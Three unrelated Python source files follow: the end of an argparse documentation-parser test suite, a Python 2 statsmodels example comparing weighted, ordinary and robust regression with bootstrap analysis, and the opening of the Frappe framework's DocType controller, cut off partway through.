'name': ['--upgrade'], 'default': False, 'help': 'foo2 help' } ] } ] } ] def test_aliased_traversal(): parser = argparse.ArgumentParser() subparsers1 = parser.add_subparsers() subparsers1.add_parser('level1', aliases=['l1']) data = parse_parser(parser) data2 = parser_navigate(data, 'level1') assert(data2 == { 'bare_usage': 'py.test level1 [-h]', 'help': '', 'usage': 'usage: py.test level1 [-h]', 'name': 'level1 (l1)', 'identifier': 'level1'}) def test_parse_nested_traversal(): parser = argparse.ArgumentParser() subparsers1 = parser.add_subparsers() subparser1 = subparsers1.add_parser('level1') subparsers2 = subparser1.add_subparsers() subparser2 = subparsers2.add_parser('level2') subparsers3 = subparser2.add_subparsers() subparser3 = subparsers3.add_parser('level3') subparser3.add_argument('foo', help='foo help') subparser3.add_argument('bar') data = parse_parser(parser) data3 = parser_navigate(data, 'level1 level2 level3') assert data3['action_groups'][0]['options'] == [ { 'name': ['foo'], 'help': 'foo help', 'default': None }, { 'name': ['bar'], 'help': '', 'default': None } ] data2 = parser_navigate(data, 'level1 level2') assert data2['children'] == [ { 'name': 'level3', 'help': '', 'usage': 'usage: py.test level1 level2 level3 [-h] foo bar', 'bare_usage': 'py.test level1 level2 level3 [-h] foo bar', 'action_groups': [ { 'title': 'Positional Arguments', 'description': None, 'options': [ { 'default': None, 'name': ['foo'], 'help': 'foo help' }, { 'name': ['bar'], 'help': '', 'default': None } ] } ] } ] assert data == parser_navigate(data, '') def test_fill_in_default_prog(): """ Ensure that %(default)s and %(prog)s are getting properly filled in inside help='' """ parser = argparse.ArgumentParser(prog='test_fill_in_default_prog') parser.add_argument('bar', default='foo', help='%(prog)s (default: %(default)s)') data = parse_parser(parser) assert data['action_groups'][0]['options'] == [ { 'default': '"foo"', 'name': ['bar'], 'help': 'test_fill_in_default_prog (default: "foo")' } ] def test_string_quoting(): """ If an optional argument has a string type and a default, then the default should be in quotes. This prevents things like '--optLSFConf=-q short' when '--optLSFConf="-q short"' is correct. """ parser = argparse.ArgumentParser(prog='test_string_quoting_prog') parser.add_argument('--bar', default='foo bar', help='%(prog)s (default: %(default)s)') data = parse_parser(parser) assert data['action_groups'][0]['options'] == [ { 'default': '"foo bar"', 'name': ['--bar'], 'help': 'test_string_quoting_prog (default: "foo bar")' } ] def test_parse_groups(): parser = argparse.ArgumentParser() parser.add_argument('--foo', action='store_true', default=False, help='foo help') parser.add_argument('--bar', action='store_true', default=False) optional = parser.add_argument_group('Group 1') optional.add_argument("--option1", help='option #1') optional.add_argument("--option2", help='option #2') data = parse_parser(parser) assert data['action_groups'] == [ { 'description': None, 'options': [ {'default': False, 'help': 'foo help', 'name': ['--foo']}, {'default': False, 'help': '', 'name': ['--bar']}], 'title': 'Named Arguments'}, { 'description': None, 'options': [ {'default': None, 'help': 'option #1', 'name': ['--option1']}, {'default': None, 'help': 'option #2', 'name': ['--option2']}], 'title': 'Group 1' } ] def test_action_groups_with_subcommands(): """ This is a somewhat overly complicated example incorporating both action groups (with optional AND positional arguments) and subcommands (again with both optional and positional arguments) """ parser = argparse.ArgumentParser('foo') subparsers = parser.add_subparsers() parserA = subparsers.add_parser('A', help='A subparser') parserA.add_argument('baz', type=int, help='An integer') parserB = subparsers.add_parser('B', help='B subparser') parserB.add_argument('--barg', choices='XYZ', help='A list of choices') parser.add_argument('--foo', help='foo help') parser.add_argument('foo2', metavar='foo2 metavar', help='foo2 help') grp1 = parser.add_argument_group('bar options') grp1.add_argument('--bar', help='bar help') grp1.add_argument('quux', help='quux help') grp2 = parser.add_argument_group('bla options') grp2.add_argument('--blah', help='blah help') grp2.add_argument('sniggly', help='sniggly help') data = parse_parser(parser) assert data['action_groups'] == [ {'options': [{'default': None, 'name': ['foo2 metavar'], 'help': 'foo2 help'}], 'description': None, 'title': 'Positional Arguments'}, {'options': [{'default': None, 'name': ['--foo'], 'help': 'foo help'}], 'description': None, 'title': 'Named Arguments'}, {'options': [{'default': None, 'name': ['--bar'], 'help': 'bar help'}, {'default': None, 'name': ['quux'], 'help': 'quux help'}], 'description': None, 'title': 'bar options'}, {'options': [{'default': None, 'name': ['--blah'], 'help': 'blah help'}, {'default': None, 'name': ['sniggly'], 'help': 'sniggly help'}], 'description': None, 'title': 'bla options'} ] assert data['children'] == [ {'usage': 'usage: foo A [-h] baz', 'action_groups': [{'options': [{'default': None, 'name': ['baz'], 'help': 'An integer'}], 'description': None, 'title': 'Positional Arguments'}], 'bare_usage': 'foo A [-h] baz', 'name': 'A', 'help': 'A subparser'}, {'usage': 'usage: foo B [-h] [--barg {X,Y,Z}]', 'action_groups': [{'options': [{'default': None, 'choices': 'XYZ', 'name': ['--barg'], 'help': 'A list of choices'}], 'description': None, 'title': 'Named Arguments'}], 'bare_usage': 'foo B [-h] [--barg {X,Y,Z}]', 'name': 'B', 'help': 'B subparser'} ]
""" Example: scikits.statsmodels.WLS example is extended to look at the meaning of rsquared in WLS, at outliers, compares with RLM and a short bootstrap """ import numpy as np import scikits.statsmodels as sm import matplotlib.pyplot as plt data = sm.datasets.ccard.load() data.exog = sm.add_constant(data.exog) ols_fit = sm.OLS(data.endog, data.exog).fit() # perhaps the residuals from this fit depend on the square of income incomesq = data.exog[:,2] plt.scatter(incomesq, ols_fit.resid) plt.grid() # If we think that the variance is proportional to income**2 # we would want to weight the regression by income # the weights argument in WLS weights the regression by its square root # and since income enters the equation, if we have income/income # it becomes the constant, so we would want to perform # this type of regression without an explicit constant in the design #data.exog = data.exog[:,:-1] wls_fit = sm.WLS(data.endog, data.exog[:,:-1], weights=1/incomesq).fit() # This however, leads to difficulties in interpreting the post-estimation # statistics. Statsmodels does not yet handle this elegantly, but # the following may be more appropriate # explained sum of squares ess = wls_fit.uncentered_tss - wls_fit.ssr # rsquared rsquared = ess/wls_fit.uncentered_tss # mean squared error of the model mse_model = ess/(wls_fit.df_model + 1) # add back the dof of the constant # f statistic fvalue = mse_model/wls_fit.mse_resid # adjusted r-squared rsquared_adj = 1 -(wls_fit.nobs)/(wls_fit.df_resid)*(1-rsquared) #Trying to figure out what's going on in this example #---------------------------------------------------- #JP: I need to look at this again. Even if I exclude the weight variable # from the regressors and keep the constant in then the reported rsquared # stays small. Below also compared using squared or sqrt of weight variable. # TODO: need to add 45 degree line to graphs wls_fit3 = sm.WLS(data.endog, data.exog[:,(0,1,3,4)], weights=1/incomesq).fit() print wls_fit3.summary() print 'corrected rsquared', print (wls_fit3.uncentered_tss - wls_fit3.ssr)/wls_fit3.uncentered_tss plt.figure() plt.title('WLS dropping heteroscedasticity variable from regressors') plt.plot(data.endog, wls_fit3.fittedvalues, 'o') plt.xlim([0,2000]) plt.ylim([0,2000]) print 'raw correlation of endog and fittedvalues' print np.corrcoef(data.endog, wls_fit.fittedvalues) print 'raw correlation coefficient of endog and fittedvalues squared' print np.corrcoef(data.endog, wls_fit.fittedvalues)[0,1]**2 # compare with robust regression, # heteroscedasticity correction downweights the outliers rlm_fit = sm.RLM(data.endog, data.exog).fit() plt.figure() plt.title('using robust for comparison') plt.plot(data.endog, rlm_fit.fittedvalues, 'o') plt.xlim([0,2000]) plt.ylim([0,2000]) #What is going on? A more systematic look at the data #---------------------------------------------------- # two helper functions def getrsq(fitresult): '''calculates rsquared residual, total and explained sums of squares Parameters ---------- fitresult : instance of Regression Result class, or tuple of (resid, endog) arrays regression residuals and endogenous variable Returns ------- rsquared residual sum of squares (centered) total sum of squares explained sum of squares (for centered) ''' if hasattr(fitresult, 'resid') and hasattr(fitresult, 'model'): resid = fitresult.resid endog = fitresult.model.endog nobs = fitresult.nobs else: resid = fitresult[0] endog = fitresult[1] nobs = resid.shape[0] rss = np.dot(resid, resid) tss = np.var(endog)*nobs return 1-rss/tss, rss, tss, tss-rss def index_trim_outlier(resid, k): '''returns indices to residual array with k outliers removed Parameters ---------- resid : array_like, 1d data vector, usually residuals of a regression k : int number of outliers to remove Returns ------- trimmed_index : array, 1d index array with k outliers removed outlier_index : array, 1d index array of k outliers Notes ----- Outliers are defined as the k observations with the largest absolute values. ''' sort_index = np.argsort(np.abs(resid)) # index of non-outlier trimmed_index = np.sort(sort_index[:-k]) outlier_index = np.sort(sort_index[-k:]) return trimmed_index, outlier_index #Comparing estimation results for ols, rlm and wls with and without outliers #--------------------------------------------------------------------------- #ols_test_fit = sm.OLS(data.endog, data.exog).fit() olskeep, olsoutl = index_trim_outlier(ols_fit.resid, 2) print 'ols outliers', olsoutl, ols_fit.resid[olsoutl] ols_fit_rm2 = sm.OLS(data.endog[olskeep], data.exog[olskeep,:]).fit() rlm_fit_rm2 = sm.RLM(data.endog[olskeep], data.exog[olskeep,:]).fit() #weights = 1/incomesq results = [ols_fit, ols_fit_rm2, rlm_fit, rlm_fit_rm2] #Note: I think incomesq is already square for weights in [1/incomesq, 1/incomesq**2, np.sqrt(incomesq)]: print '\nComparison OLS and WLS with and without outliers' wls_fit0 = sm.WLS(data.endog, data.exog, weights=weights).fit() wls_fit_rm2 = sm.WLS(data.endog[olskeep], data.exog[olskeep,:], weights=weights[olskeep]).fit() wlskeep, wlsoutl = index_trim_outlier(ols_fit.resid, 2) print '2 outliers candidates and residuals' print wlsoutl, wls_fit.resid[olsoutl] # redundant because ols and wls outliers are the same: ##wls_fit_rm2_ = sm.WLS(data.endog[wlskeep], data.exog[wlskeep,:], ## weights=1/incomesq[wlskeep]).fit() print 'outliers ols, wls:', olsoutl, wlsoutl print 'rsquared' print 'ols vs ols rm2', ols_fit.rsquared, ols_fit_rm2.rsquared print 'wls vs wls rm2', wls_fit0.rsquared, wls_fit_rm2.rsquared #, wls_fit_rm2_.rsquared print 'compare R2_resid versus R2_wresid' print 'ols minus 2', getrsq(ols_fit_rm2)[0], print getrsq((ols_fit_rm2.wresid, ols_fit_rm2.model.wendog))[0] print 'wls ', getrsq(wls_fit)[0], print getrsq((wls_fit.wresid, wls_fit.model.wendog))[0] print 'wls minus 2', getrsq(wls_fit_rm2)[0], # next is same as wls_fit_rm2.rsquared for cross checking print getrsq((wls_fit_rm2.wresid, wls_fit_rm2.model.wendog))[0] #print getrsq(wls_fit_rm2_)[0], #print getrsq((wls_fit_rm2_.wresid, wls_fit_rm2_.model.wendog))[0] results.extend([wls_fit0, wls_fit_rm2]) print ' ols ols_rm2 rlm rlm_rm2 wls (lin) wls_rm2 (lin) wls (squ) wls_rm2 (squ) wls (sqrt) wls_rm2 (sqrt)' print 'Parameter estimates' print np.column_stack([r.params for r in results]) print 'R2 original data, next line R2 weighted data' print np.column_stack([getattr(r, 'rsquared', None) for r in results]) print 'Standard errors' print np.column_stack([getattr(r, 'bse', None) for r in results]) print 'Heteroscedasticity robust standard errors (with ols)' print 'with outliers' print np.column_stack([getattr(ols_fit, se, None) for se in ['HC0_se', 'HC1_se', 'HC2_se', 'HC3_se']]) ''' ols ols_rm2 rlm rlm_rm2 wls (lin) wls_rm2 (lin) wls (squ) wls_rm2 (squ) wls (sqrt) wls_rm2 (sqrt) Parameter estimates [[ -3.08181404 -5.06103843 -4.98510966 -5.34410309 -2.69418516 -3.1305703 -1.43815462 -1.58893054 -3.57074829 -6.80053364] [ 234.34702702 115.08753715 129.85391456 109.01433492 158.42697752 128.38182357 60.95113284 100.25000841 254.82166855 103.75834726] [ -14.99684418 -5.77558429 -6.46204829 -4.77409191 -7.24928987 -7.41228893 6.84943071 -3.34972494 -16.40524256 -4.5924465 ] [ 27.94090839 85.46566835 89.91389709 95.85086459 60.44877369 79.7759146 55.9884469 60.97199734 -3.8085159 84.69170048] [-237.1465136 39.51639838 -15.50014814 31.39771833 -114.10886935 -40.04207242 -6.41976501 -38.83583228 -260.72084271 117.20540179]] R2 original data, next line R2 weighted data [[ 0.24357792 0.31745994 0.19220308 0.30527648 0.22861236 0.3112333 0.06573949 0.29366904 0.24114325 0.31218669]] [[ 0.24357791 0.31745994 None None 0.05936888 0.0679071 0.06661848 0.12769654 0.35326686 0.54681225]] -> R2 with weighted data is jumping all over standard errors [[ 5.51471653 3.31028758 2.61580069 2.39537089 3.80730631 2.90027255 2.71141739 2.46959477 6.37593755 3.39477842] [ 80.36595035 49.35949263 38.12005692 35.71722666 76.39115431 58.35231328 87.18452039 80.30086861 86.99568216 47.58202096] [ 7.46933695 4.55366113 3.54293763 3.29509357 9.72433732 7.41259156 15.15205888 14.10674821 7.18302629 3.91640711] [ 82.92232357 50.54681754 39.33262384 36.57639175 58.55088753 44.82218676 43.11017757 39.31097542 96.4077482 52.57314209] [ 199.35166485 122.1287718 94.55866295 88.3741058 139.68749646 106.89445525 115.79258539 105.99258363 239.38105863 130.32619908]] robust standard errors (with ols) with outliers HC0_se HC1_se HC2_se HC3_se' [[ 3.30166123 3.42264107 3.4477148 3.60462409] [ 88.86635165 92.12260235 92.08368378 95.48159869] [ 6.94456348 7.19902694 7.19953754 7.47634779] [ 92.18777672 95.56573144 95.67211143 99.31427277] [ 212.9905298 220.79495237 221.08892661 229.57434782]] removing 2 outliers [[ 2.57840843 2.67574088 2.68958007 2.80968452] [ 36.21720995 37.58437497 37.69555106 39.51362437] [ 3.1156149 3.23322638 3.27353882 3.49104794] [ 50.09789409 51.98904166 51.89530067 53.79478834] [ 94.27094886 97.82958699 98.25588281 102.60375381]] ''' # a quick bootstrap analysis # -------------------------- # #(I didn't check whether this is fully correct statistically) nobs, nvar = data.exog.shape niter = 2000 bootres = np.zeros((niter, nvar*2)) for it in range(niter): rind = np.random.randint(nobs, size=nobs) endog = data.endog[rind] exog = data.exog[rind,:] res = sm.OLS(endog, exog).fit() bootres[it, :nvar] = res.params bootres[it, nvar:] = res.bse np.set_printoptions(linewidth=200) print 'Bootstrap Results of parameters and parameter standard deviation OLS' print 'Parameter estimates' print 'median', np.median(bootres[:,:5], 0) print 'mean ', np.mean(bootres[:,:5], 0) print 'std ', np.std(bootres[:,:5], 0) print 'Standard deviation of parameter estimates' print 'median', np.median(bootres[:,5:], 0) print 'mean ', np.mean(bootres[:,5:], 0) print 'std ', np.std(bootres[:,5:], 0) plt.figure() for i in range(4): plt.subplot(2,2,i+1) plt.hist(bootres[:,i],50) plt.title('var%d'%i) plt.figtext(0.5, 0.935, 'OLS Bootstrap', ha='center', color='black', weight='bold', size='large') data_endog = data.endog[olskeep] data_exog = data.exog[olskeep,:] incomesq_rm2 = incomesq[olskeep] nobs, nvar = data_exog.shape niter = 500 # a bit slow bootreswls = np.zeros((niter, nvar*2)) for it in range(niter): rind = np.random.randint(nobs, size=nobs) endog = data_endog[rind] exog = data_exog[rind,:] res = sm.WLS(endog, exog, weights=1/incomesq[rind,:]).fit() bootreswls[it, :nvar] = res.params bootreswls[it, nvar:] = res.bse print 'Bootstrap Results of parameters and parameter standard deviation', print 'WLS removed 2 outliers from sample' print 'Parameter estimates' print 'median', np.median(bootreswls[:,:5], 0) print 'mean ', np.mean(bootreswls[:,:5], 0) print 'std ', np.std(bootreswls[:,:5], 0) print 'Standard deviation of parameter estimates' print 'median', np.median(bootreswls[:,5:], 0) print 'mean ', np.mean(bootreswls[:,5:], 0) print 'std ', np.std(bootreswls[:,5:], 0) plt.figure() for i in range(4): plt.subplot(2,2,i+1) plt.hist(bootreswls[:,i],50) plt.title('var%d'%i) plt.figtext(0.5, 0.935, 'WLS rm2 Bootstrap', ha='center', color='black', weight='bold', size='large') #plt.show() #plt.close('all') ''' The following a random variables not fixed by a seed Bootstrap Results of parameters and parameter standard deviation OLS Parameter estimates median [ -3.26216383 228.52546429 -14.57239967 34.27155426 -227.02816597] mean [ -2.89855173 234.37139359 -14.98726881 27.96375666 -243.18361746] std [ 3.78704907 97.35797802 9.16316538 94.65031973 221.79444244] Standard deviation of parameter estimates median [ 5.44701033 81.96921398 7.58642431 80.64906783 200.19167735] mean [ 5.44840542 86.02554883 8.56750041 80.41864084 201.81196849] std [ 1.43425083 29.74806562 4.22063268 19.14973277 55.34848348] Bootstrap Results of parameters and parameter standard deviation WLS removed 2 outliers from sample Parameter estimates median [ -3.95876112 137.10419042 -9.29131131 88.40265447 -44.21091869] mean [ -3.67485724 135.42681207 -8.7499235 89.74703443 -46.38622848] std [ 2.96908679 56.36648967 7.03870751 48.51201918 106.92466097] Standard deviation of parameter estimates median [ 2.89349748 59.19454402 6.70583332 45.40987953 119.05241283] mean [ 2.97600894 60.14540249 6.92102065 45.66077486 121.35519673] std [ 0.55378808 11.77831934 1.69289179 7.4911526 23.72821085] Conclusion: problem with outliers and possibly heteroscedasticity ----------------------------------------------------------------- in bootstrap results * bse in OLS underestimates the standard deviation of the parameters compared to standard deviation in bootstrap * OLS heteroscedasticity corrected standard errors for the original data (above) are close to bootstrap std * using WLS with 2 outliers removed has a relatively good match between the mean or median bse and the std of the parameter estimates in the bootstrap We could also include rsquared in bootstrap, and do it also for RLM. The problems could also mean that the linearity assumption is violated, e.g. try non-linear transformation of exog variables, but linear in parameters. for statsmodels * In this case rsquared for original data looks less random/arbitrary. * Don't change definition of rsquared from centered tss to uncentered tss when calculating rsquared in WLS if the original exog contains a constant. The increase in rsquared because of a change in definition will be very misleading. * Whether there is a constant in the transformed exog, wexog, or not, might affect also the degrees of freedom calculation, but I haven't checked this. I would guess that the df_model should stay the same, but needs to be verified with a textbook. * df_model has to be adjusted if the original data does not have a constant, e.g. when regressing an endog on a single exog variable without constant. This case might require also a redefinition of the rsquare and f statistic for the regression anova to use the uncentered tss. This can be done through keyword parameter to model.__init__ or through autodedection with hasconst = (exog.var(0)<1e-10).any() I'm not sure about fixed effects with a full dummy set but without a constant. In this case autodedection wouldn't work this way. Also, I'm not sure whether a ddof keyword parameter can also handle the hasconst case. '''
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors # MIT License. See license.txt from __future__ import unicode_literals import six import re, copy, os import frappe from frappe import _ from frappe.utils import now, cint from frappe.model import no_value_fields, default_fields from frappe.model.document import Document from frappe.custom.doctype.property_setter.property_setter import make_property_setter from frappe.desk.notifications import delete_notification_count_for from frappe.modules import make_boilerplate from frappe.model.db_schema import validate_column_name, validate_column_length, type_map from frappe.model.docfield import supports_translation import frappe.website.render # imports - third-party imports import pymysql from pymysql.constants import ER class InvalidFieldNameError(frappe.ValidationError): pass form_grid_templates = { "fields": "templates/form_grid/fields.html" } class DocType(Document): def get_feed(self): return self.name def validate(self): """Validate DocType before saving. - Check if developer mode is set. - Validate series - Check fieldnames (duplication etc) - Clear permission table for child tables - Add `amended_from` and `amended_by` if Amendable""" self.check_developer_mode() self.validate_name() if self.issingle: self.allow_import = 0 self.is_submittable = 0 self.istable = 0 elif self.istable: self.allow_import = 0 self.permissions = [] self.scrub_field_names() self.set_default_in_list_view() self.set_default_translatable() self.validate_series() self.validate_document_type() validate_fields(self) if self.istable: # no permission records for child table self.permissions = [] else: validate_permissions(self) self.make_amendable() self.validate_website() if not self.is_new(): self.before_update = frappe.get_doc('DocType', self.name) if not self.is_new(): self.setup_fields_to_fetch() if self.default_print_format and not self.custom: frappe.throw(_('Standard DocType cannot have default print format, use Customize Form')) def set_default_in_list_view(self): '''Set default in-list-view for first 4 mandatory fields''' if not [d.fieldname for d in self.fields if d.in_list_view]: cnt = 0 for d in self.fields: if d.reqd and not d.hidden and not d.fieldtype == "Table": d.in_list_view = 1 cnt += 1 if cnt == 4: break def set_default_translatable(self): '''Ensure that non-translatable never will be translatable''' for d in self.fields: if d.translatable and not supports_translation(d.fieldtype): d.translatable = 0 def check_developer_mode(self): """Throw exception if not developer mode or via patch""" if frappe.flags.in_patch or frappe.flags.in_test: return if not frappe.conf.get("developer_mode") and not self.custom: frappe.throw(_("Not in Developer Mode! Set in site_config.json or make 'Custom' DocType.")) def setup_fields_to_fetch(self): '''Setup query to update values for newly set fetch values''' try: old_meta = frappe.get_meta(frappe.get_doc('DocType', self.name), cached=False) old_fields_to_fetch = [df.fieldname for df in old_meta.get_fields_to_fetch()] except frappe.DoesNotExistError: old_fields_to_fetch = [] new_meta = frappe.get_meta(self, cached=False) self.flags.update_fields_to_fetch_queries = [] if set(old_fields_to_fetch) != set([df.fieldname for df in new_meta.get_fields_to_fetch()]): for df in new_meta.get_fields_to_fetch(): if df.fieldname not in old_fields_to_fetch: link_fieldname, source_fieldname = df.fetch_from.split('.', 1) link_df = new_meta.get_field(link_fieldname) self.flags.update_fields_to_fetch_queries.append('''update `tab{link_doctype}` source, `tab{doctype}` target set target.`{fieldname}` = source.`{source_fieldname}` where target.`{link_fieldname}` = source.name and ifnull(target.`{fieldname}`, '')="" '''.format( link_doctype = link_df.options, source_fieldname = source_fieldname, doctype = self.name, fieldname = df.fieldname, link_fieldname = link_fieldname )) def update_fields_to_fetch(self): '''Update fetch values based on queries setup''' if self.flags.update_fields_to_fetch_queries: for query in self.flags.update_fields_to_fetch_queries: frappe.db.sql(query) def validate_document_type(self): if self.document_type=="Transaction": self.document_type = "Document" if self.document_type=="Master": self.document_type = "Setup" def validate_website(self): """Ensure that website generator has field 'route'""" if self.has_web_view: # route field must be present if not 'route' in [d.fieldname for d in self.fields]: frappe.throw(_('Field "route" is mandatory for Web Views'), title='Missing Field') # clear website cache frappe.website.render.clear_cache() def change_modified_of_parent(self): """Change the timestamp of parent DocType if the current one is a child to clear caches.""" if frappe.flags.in_import: return parent_list = frappe.db.sql("""SELECT parent from tabDocField where fieldtype="Table" and options=%s""", self.name) for p in parent_list: frappe.db.sql('UPDATE tabDocType SET modified=%s WHERE `name`=%s', (now(), p[0])) def scrub_field_names(self): """Sluggify fieldnames if not set from Label.""" restricted = ('name','parent','creation','modified','modified_by', 'parentfield','parenttype','file_list', 'flags', 'docstatus') for d in self.get("fields"): if d.fieldtype: if (not getattr(d, "fieldname", None)): if d.label: d.fieldname = d.label.strip().lower().replace(' ','_') if d.fieldname in restricted: d.fieldname = d.fieldname + '1' else: d.fieldname = d.fieldtype.lower().replace(" ","_") + "_" + str(d.idx) d.fieldname = re.sub('''['",./%@()<>{}]''', '', d.fieldname) # fieldnames should be lowercase d.fieldname = d.fieldname.lower() def validate_series(self, autoname=None, name=None): """Validate if `autoname` property is correctly set.""" if not autoname: autoname = self.autoname if not name: name = self.name if not autoname and self.get("fields", {"fieldname":"naming_series"}): self.autoname = "naming_series:" # validate field name if autoname field:fieldname is used if autoname and autoname.startswith('field:'): field = autoname.split(":")[1] if not field or field not in [ df.fieldname for df in self.fields ]: frappe.throw(_("Invalid fieldname '{0}' in autoname".format(field))) if autoname and (not autoname.startswith('field:')) \ and (not autoname.startswith('eval:')) \ and (not autoname.lower() in ('prompt', 'hash')) \ and (not autoname.startswith('naming_series:')): prefix = autoname.split('.')[0] used_in = frappe.db.sql('select name from tabDocType where substring_index(autoname, ".", 1) = %s and name!=%s', (prefix, name)) if used_in: frappe.throw(_("Series {0} already used in {1}").format(prefix, used_in[0][0])) def on_update(self): """Update database schema, make controller templates if `custom` is not set and clear cache.""" from frappe.model.db_schema import updatedb self.delete_duplicate_custom_fields() updatedb(self.name, self) self.change_modified_of_parent() make_module_and_roles(self) self.update_fields_to_fetch() from frappe import conf if not self.custom and not (frappe.flags.in_import or frappe.flags.in_test) and conf.get('developer_mode'): self.export_doc() self.make_controller_template() if self.has_web_view: self.set_base_class_for_controller() # update index if not self.custom: self.run_module_method("on_doctype_update") if self.flags.in_insert: self.run_module_method("after_doctype_insert") delete_notification_count_for(doctype=self.name) frappe.clear_cache(doctype=self.name) if not frappe.flags.in_install and hasattr(self, 'before_update'): self.sync_global_search() # clear from local cache if self.name in frappe.local.meta_cache: del frappe.local.meta_cache[self.name] clear_linked_doctype_cache() def delete_duplicate_custom_fields(self): if not (frappe.db.table_exists(self.name) and frappe.db.table_exists("Custom Field")): return fields = [d.fieldname for d in self.fields if d.fieldtype in type_map] frappe.db.sql('''delete from `tabCustom Field` where dt = {0} and fieldname in ({1}) '''.format('%s', ', '.join(['%s'] * len(fields))), tuple([self.name] + fields), as_dict=True) def sync_global_search(self): '''If global search settings are changed, rebuild search properties for this table''' global_search_fields_before_update = [d.fieldname for d in self.before_update.fields if d.in_global_search] if self.before_update.show_name_in_global_search: global_search_fields_before_update.append('name') global_search_fields_after_update = [d.fieldname for d in self.fields if d.in_global_search] if self.show_name_in_global_search: global_search_fields_after_update.append('name') if set(global_search_fields_before_update) != set(global_search_fields_after_update): now = (not frappe.request) or frappe.flags.in_test or frappe.flags.in_install frappe.enqueue('frappe.utils.global_search.rebuild_for_doctype', now=now, doctype=self.name) def set_base_class_for_controller(self): '''Updates the controller class to subclass from `WebsiteGenertor`, if it is a subclass of `Document`''' controller_path = frappe.get_module_path(frappe.scrub(self.module), 'doctype', frappe.scrub(self.name), frappe.scrub(self.name) + '.py') with open(controller_path, 'r') as f: code = f.read() class_string = '\nclass {0}(Document)'.format(self.name.replace(' ', '')) if '\nfrom frappe.model.document import Document' in code and class_string in code: code = code.replace('from frappe.model.document import Document', 'from frappe.website.website_generator import WebsiteGenerator') code = code.replace('class {0}(Document)'.format(self.name.replace(' ', '')), 'class {0}(WebsiteGenerator)'.format(self.name.replace(' ', ''))) with open(controller_path, 'w') as f: f.write(code) def run_module_method(self, method): from frappe.modules import load_doctype_module module = load_doctype_module(self.name, self.module) if hasattr(module, method): getattr(module, method)() def before_rename(self, old, new, merge=False): """Throw exception if merge. DocTypes cannot be merged.""" if not self.custom and frappe.session.user != "Administrator": frappe.throw(_("DocType can only be renamed by Administrator")) self.check_developer_mode() self.validate_name(new) if merge: frappe.throw(_("DocType can not be merged")) def after_rename(self, old, new, merge=False): """Change table name using `RENAME TABLE` if table exists. Or update `doctype` property for Single type.""" if self.issingle: frappe.db.sql("""update tabSingles set doctype=%s where doctype=%s""", (new, old)) frappe.db.sql("""update tabSingles set value=%s where doctype=%s and field='name' and value = %s""", (new, new, old)) else: frappe.db.sql("rename table `tab%s` to `tab%s`" % (old, new)) def before_reload(self): """Preserve naming series changes in Property Setter.""" if not (self.issingle and self.istable): self.preserve_naming_series_options_in_property_setter() def preserve_naming_series_options_in_property_setter(self): """Preserve naming_series as property setter if it does not exist""" naming_series = self.get("fields", {"fieldname": "naming_series"}) if not naming_series: return # check if atleast 1 record exists if not (frappe.db.table_exists(self.name) and frappe.db.sql("select name from `tab{}` limit 1".format(self.name))): return existing_property_setter = frappe.db.get_value("Property Setter", {"doc_type": self.name, "property": "options", "field_name": "naming_series"}) if not existing_property_setter: make_property_setter(self.name, "naming_series", "options", naming_series[0].options, "Text", validate_fields_for_doctype=False) if naming_series[0].default: make_property_setter(self.name, "naming_series", "default", naming_series[0].default, "Text", validate_fields_for_doctype=False) def export_doc(self): """Export to standard folder `[module]/doctype/[name]/[name].json`.""" from frappe.modules.export_file import export_to_files export_to_files(record_list=[['DocType', self.name]], create_init=True) def import_doc(self): """Import from standard folder `[module]/doctype/[name]/[name].json`.""" from frappe.modules.import_module import import_from_files import_from_files(record_list=[[self.module, 'doctype', self.name]]) def make_controller_template(self): """Make boilerplate controller template.""" make_boilerplate("controller._py", self) if not self.istable: make_boilerplate("test_controller._py", self.as_dict()) if not self.istable: make_boilerplate("controller.js", self.as_dict()) #make_boilerplate("controller_list.js", self.as_dict()) if not os.path.exists(frappe.get_module_path(frappe.scrub(self.module), 'doctype', frappe.scrub(self.name), 'tests')): make_boilerplate("test_controller.js", self.as_dict()) if self.has_web_view: templates_path = frappe.get_module_path(frappe.scrub(self.module), 'doctype', frappe.scrub(self.name), 'templates') if not os.path.exists(templates_path): os.makedirs(templates_path) make_boilerplate('templates/controller.html', self.as_dict()) make_boilerplate('templates/controller_row.html', self.as_dict()) def make_amendable(self): """If is_submittable is set, add amended_from docfields.""" if self.is_submittable: if not frappe.db.sql("""select name from tabDocField where fieldname = 'amended_from' and parent = %s""", self.name): self.append("fields", { "label": "Amended From", "fieldtype": "Link", "fieldname": "amended_from", "options": self.name, "read_only": 1, "print_hide": 1, "no_copy": 1 }) def get_max_idx(self): """Returns the highest `idx`""" max_idx = frappe.db.sql("""select max(idx) from `tabDocField` where parent = %s""", self.name) return max_idx and max_idx[0][0] or 0 def validate_name(self, name=None): if not name: name = self.name # a DocType's name should not start with a number or underscore # and should only contain letters, numbers and underscore if six.PY2: is_a_valid_name = re.match("^(?![\W])[^\d_\s][\w -]+$", name) else: is_a_valid_name = re.match("^(?![\W])[^\d_\s][\w -]+$", name, flags = re.ASCII) if not is_a_valid_name: frappe.throw(_("DocType's name should start with a letter and it can only consist of letters, numbers, spaces and underscores"), frappe.NameError) def validate_fields_for_doctype(doctype): doc = frappe.get_doc("DocType", doctype) doc.delete_duplicate_custom_fields() validate_fields(frappe.get_meta(doctype, cached=False)) # this is separate because it is also called via custom field def validate_fields(meta): """Validate doctype fields. Checks 1. There are no illegal characters in fieldnames 2. If fieldnames are unique. 3. Validate column length. 4. Fields that do have database columns are not mandatory. 5. `Link` and `Table` options are valid. 6. **Hidden** and **Mandatory** are not set simultaneously. 7. `Check` type field has default as 0 or 1. 8. `Dynamic Links` are correctly defined. 9. Precision is set in numeric fields and is between 1 & 6. 10. Fold is not at the end (if set). 11. `search_fields` are valid. 12. `title_field` and title field pattern are valid. 13. `unique` check is only valid for Data, Link and Read Only fieldtypes. 14. `unique` cannot be checked if there exist non-unique values. :param meta: `frappe.model.meta.Meta` object to check.""" def check_illegal_characters(fieldname): validate_column_name(fieldname) def check_unique_fieldname(fieldname): duplicates = list(filter(None, map(lambda df: df.fieldname==fieldname and str(df.idx) or None, fields))) if len(duplicates) > 1: frappe.throw(_("Fieldname {0} appears multiple times in rows {1}").format(fieldname, ", ".join(duplicates))) def check_fieldname_length(fieldname): validate_column_length(fieldname) def check_illegal_mandatory(d): if (d.fieldtype in no_value_fields) and d.fieldtype!="Table" and d.reqd: frappe.throw(_("Field {0} of type {1} cannot be mandatory").format(d.label, d.fieldtype)) def check_link_table_options(d): if d.fieldtype in ("Link", "Table"): if not d.options: frappe.throw(_("Options 